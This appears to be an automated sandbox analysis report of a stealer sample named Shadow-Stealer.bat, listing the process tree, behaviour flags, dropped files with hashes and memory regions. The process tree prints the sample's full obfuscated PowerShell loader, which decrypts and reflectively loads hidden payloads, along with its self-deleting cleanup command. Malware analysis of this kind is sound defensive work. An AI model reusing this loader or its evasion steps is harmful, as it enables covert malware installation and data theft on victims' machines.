                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{4fbe0289-c856-4047-805c-11689a33721b}
                                                      5⤵
                                                        PID:5520
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 476
                                                          6⤵
                                                          • Program crash
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          PID:5700
                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{4fd59ff4-8432-4b06-b013-7419c814bb98}
                                                        5⤵
                                                          PID:5516
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                                                  1⤵
                                                    PID:1252
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1308
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                      1⤵
                                                        PID:1432
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        1⤵
                                                          PID:1472
                                                          • C:\Windows\system32\sihost.exe
                                                            sihost.exe
                                                            2⤵
                                                              PID:2052
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                            1⤵
                                                            • Drops file in System32 directory
                                                            PID:1492
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                            1⤵
                                                              PID:1572
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                              1⤵
                                                                PID:1592
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                  PID:1688
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                  1⤵
                                                                    PID:1744
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                    1⤵
                                                                      PID:1816
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1844
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                        1⤵
                                                                          PID:1968
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:2028
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:2044
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                              1⤵
                                                                                PID:1976
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                1⤵
                                                                                  PID:2056
                                                                                • C:\Windows\System32\spoolsv.exe
                                                                                  C:\Windows\System32\spoolsv.exe
                                                                                  1⤵
                                                                                    PID:2140
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                    1⤵
                                                                                      PID:2288
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                      1⤵
                                                                                        PID:2336
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                        1⤵
                                                                                          PID:2344
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:2424
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                          1⤵
                                                                                            PID:2440
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                            1⤵
                                                                                              PID:2456
                                                                                            • C:\Windows\sysmon.exe
                                                                                              C:\Windows\sysmon.exe
                                                                                              1⤵
                                                                                                PID:2552
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                1⤵
                                                                                                  PID:2584
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                  1⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2596
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2616
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                    1⤵
                                                                                                      PID:2644
                                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:420
                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                        C:\Windows\Explorer.EXE
                                                                                                        1⤵
                                                                                                          PID:3316
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"
                                                                                                            2⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3588
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              3⤵
                                                                                                                PID:2568
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
                                                                                                                "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                3⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Deletes itself
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Drops file in Windows directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1904
                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{13190d35-2ee9-4a8b-9f54-2eb814499454}
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2076
                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{a0f8c7f4-a97c-46d7-abd1-d678cb0569d5}
                                                                                                                  4⤵
                                                                                                                    PID:3032
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit
                                                                                                                    4⤵
                                                                                                                      PID:784
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        5⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:3564
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        PING localhost -n 8
                                                                                                                        5⤵
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:1504
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3880
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5704
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                1⤵
                                                                                                                  PID:3444
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                  1⤵
                                                                                                                    PID:3492
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3860
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:3924
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:4012
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                        1⤵
                                                                                                                          PID:4024
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                          1⤵
                                                                                                                            PID:4240
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                            1⤵
                                                                                                                              PID:4448
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                              1⤵
                                                                                                                                PID:3220
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                1⤵
                                                                                                                                  PID:724
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:2304
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                    1⤵
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:5004
                                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:4204
                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:1960
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                      1⤵
                                                                                                                                        PID:2100
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:4300
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4584
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                            PID:3372
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 6000 -ip 6000
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:4512
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5520 -ip 5520
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:3884
                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 416 -p 5836 -ip 5836
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:5724
                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:5344
                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:5156
                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:3412
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:1396
                                                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                1⤵
                                                                                                                                                  PID:1012
                                                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5660
                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5532

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2e892adc-8c81-41cd-891e-3af2f5c3f43d.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      37KB

                                                                                                                                                      MD5

                                                                                                                                                      cceb2282a17391dd8b3b58127b63b677

                                                                                                                                                      SHA1

                                                                                                                                                      695db1fde4cfe0ce62a0630517865b54f8415dcc

                                                                                                                                                      SHA256

                                                                                                                                                      5697f65e0ddb0a1309414dc28a97b04ffe17b6178dc4f43181a3c09614ec07d3

                                                                                                                                                      SHA512

                                                                                                                                                      a6d84c3edaba4ad2d43c9d686c8f5f3a7a203bab15c709a8c464e5362e810502961c6aeffe3b41d172c838bcec20c9f673f8492b8824b49dff1c2b5ac0963e09

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.346cb33f-8fd2-4800-b246-867b7e846e0d.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      38KB

                                                                                                                                                      MD5

                                                                                                                                                      5356104d522b9b83775b67022ce4c870

                                                                                                                                                      SHA1

                                                                                                                                                      23a2e6dd8771b60a2c93e2c86d2b2d3c9ecc0b1e

                                                                                                                                                      SHA256

                                                                                                                                                      08c01857a0126046397dd9f2d402975ea04ea2386995c9802a282d1328435d4d

                                                                                                                                                      SHA512

                                                                                                                                                      9660583545b7da3b693be46e06f3fb75e870d6da0cd78db3478217e5ce4f58631a6465b4751d3113f0ca4996198cf59f45aff813a2bc1d064e0f7a532e34466c

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.398afaa8-91f0-4bb1-9c4b-c59d79210788.tmp.csv
                                                                                                                                                      Filesize

                                                                                                                                                      37KB

                                                                                                                                                      MD5

                                                                                                                                                      afcb6894ba6405213ef1d753c1ad6373

                                                                                                                                                      SHA1

                                                                                                                                                      c224528e189ba64d00ac0de599520ac366f8ce49

                                                                                                                                                      SHA256

                                                                                                                                                      a5479e0b92db219695d1a4c528eed0fc057843b7ef32eede75c8d4ad01c345e1

                                                                                                                                                      SHA512

                                                                                                                                                      c2a6f7d09b12be3879b9af82de6bdc325e9c7dc99cbd3311d72691e6dca9c3657a16a4e075498c5cce5bf6b7b13f58a389e928b1678b900391177f5c7d4c6d56

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.587879dd-dfa7-4781-9c88-7f012501f9bc.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      8d721bd8e65c6c1a601cf3ca7e8a1ca5

                                                                                                                                                      SHA1

                                                                                                                                                      c6edf4513067f95da94465b92e45730058a9662f

                                                                                                                                                      SHA256

                                                                                                                                                      f58e81ff7164aef284b5473f14e7955d2fda43f83fe3ef4937065e8e0670317d

                                                                                                                                                      SHA512

                                                                                                                                                      d73ad10ebf113e51aeb3d3a6cbb3235d5063c29920ac3e1012c0b942315497c9d25c3aedaff5c987538fd291cb50cba64f5a96ba957d6fdfb4efe8339caa3aae

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.7182e2f9-39d2-4bc9-bf2c-3211c78c11fc.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      269ebbee8017d398827c5614a8544eef

                                                                                                                                                      SHA1

                                                                                                                                                      df6ef0c3309f586a2c72d28e941b8ce1962a47db

                                                                                                                                                      SHA256

                                                                                                                                                      711671a78446fce771bb2898711f005b4fed3617cb790d1706d6108ca47c70f6

                                                                                                                                                      SHA512

                                                                                                                                                      462603f466cb0b8ca943b65029bd395aea3fa797d35bfa81bb9a74f418ba091680497dd3e25d8e81d549d82b3a877e9c937b99a6e1f04f3de1099940d243d851

                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.fd609eca-fc31-49fc-9d06-a612ecef8067.tmp.txt
                                                                                                                                                      Filesize

                                                                                                                                                      13KB

                                                                                                                                                      MD5

                                                                                                                                                      cebbd39d5b68423f649441e18c1efd2d

                                                                                                                                                      SHA1

                                                                                                                                                      ae4547efdc5dcd02c99ca42ddd07ef62cf63da7f

                                                                                                                                                      SHA256

                                                                                                                                                      fadb6334f2c3b90faa4320bac5d92bc6cb82081c6f40cfef987d33aaf669d040

                                                                                                                                                      SHA512

                                                                                                                                                      4438d7694ab78de3b83e64458031b704495df4e3f950ca229939c41c57fc529973ebc08a16f8ede044c93d422c8bcc8bf8df0b18c91e8e9ee3de4332bb0c29f0

                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                                                      Filesize

                                                                                                                                                      404B

                                                                                                                                                      MD5

                                                                                                                                                      76e20105efa6a187d6ff9134656f83bb

                                                                                                                                                      SHA1

                                                                                                                                                      4afc337579d22b55ab9f86dd8a41f4d2569227f7

                                                                                                                                                      SHA256

                                                                                                                                                      85fdcf5b2a407ff2552f77c441215887df0b9aa95fae0b0a025c82bc833c2c32

                                                                                                                                                      SHA512

                                                                                                                                                      a11199175c3c94c0281730d44bd4c0f0f35773359354cca76dc9f87eebb01b412418291f8447f6f43909ced8dbe4ec5a993c88b0d39d6ec63d8700b0ad300844

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
                                                                                                                                                      Filesize

                                                                                                                                                      440KB

                                                                                                                                                      MD5

                                                                                                                                                      0e9ccd796e251916133392539572a374

                                                                                                                                                      SHA1

                                                                                                                                                      eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                                                                                                                                      SHA256

                                                                                                                                                      c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                                                                                                                                      SHA512

                                                                                                                                                      e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wucjnjo.icx.ps1
                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • C:\Windows\$sxr-cmd.exe
                                                                                                                                                      Filesize

                                                                                                                                                      324KB

                                                                                                                                                      MD5

                                                                                                                                                      c5db7b712f280c3ae4f731ad7d5ea171

                                                                                                                                                      SHA1

                                                                                                                                                      e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

                                                                                                                                                      SHA256

                                                                                                                                                      f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

                                                                                                                                                      SHA512

                                                                                                                                                      bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

                                                                                                                                                    • C:\Windows\$sxr-mshta.exe
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                      MD5

                                                                                                                                                      356e04e106f6987a19938df67dea0b76

                                                                                                                                                      SHA1

                                                                                                                                                      f2fd7cde5f97427e497dfb07b7f682149dc896fb

                                                                                                                                                      SHA256

                                                                                                                                                      4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

                                                                                                                                                      SHA512

                                                                                                                                                      df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                      Filesize

                                                                                                                                                      338B

                                                                                                                                                      MD5

                                                                                                                                                      14c2a0799e3bd5d29ba4ff6ce84adde8

                                                                                                                                                      SHA1

                                                                                                                                                      55bbba506947f9fa0478c1fe36cec9f587bd6fad

                                                                                                                                                      SHA256

                                                                                                                                                      708c34d1f7aad1c51eb3bb973843e4d01affecad5693201060a5ccd578fb7d93

                                                                                                                                                      SHA512

                                                                                                                                                      273028ffba769f00950abc541bc305c23f4636ef5f3905f3fe64f59ca96d25c69f30ba932f6e1e00f4d94f5306ee449c8e8b90ac022ca9dcb70ca5e3fe40d944

                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                                                      Filesize

                                                                                                                                                      412B

                                                                                                                                                      MD5

                                                                                                                                                      60ff1ec5d8b2bfc71402c97ddec1b563

                                                                                                                                                      SHA1

                                                                                                                                                      6a2f7b6d470d1dbfbae6a32b424a92cbc77a01f8

                                                                                                                                                      SHA256

                                                                                                                                                      79fccbbe8e5e82bbcde6de196ac2fdcc15345972243ae738750973747a8c05ce

                                                                                                                                                      SHA512

                                                                                                                                                      f6e28784af15568b44244e2954104361d4ee0df28f78f373be01bc2a70a6ca9758e6eea3710dd8a8fc99f51496d3798a6134d45c43d551ec2920b731c3c93ee6

                                                                                                                                                    • memory/556-107-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/556-106-0x00000196518B0000-0x00000196518D7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/636-99-0x000001E352630000-0x000001E352657000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/636-103-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/636-98-0x000001E352600000-0x000001E352622000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/692-101-0x000001C437430000-0x000001C437457000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/692-109-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/708-116-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/708-115-0x0000026FC3DA0000-0x0000026FC3DC7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/752-126-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/752-125-0x000002AB7E110000-0x000002AB7E137000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/1000-112-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1000-111-0x000001A1CE490000-0x000001A1CE4B7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

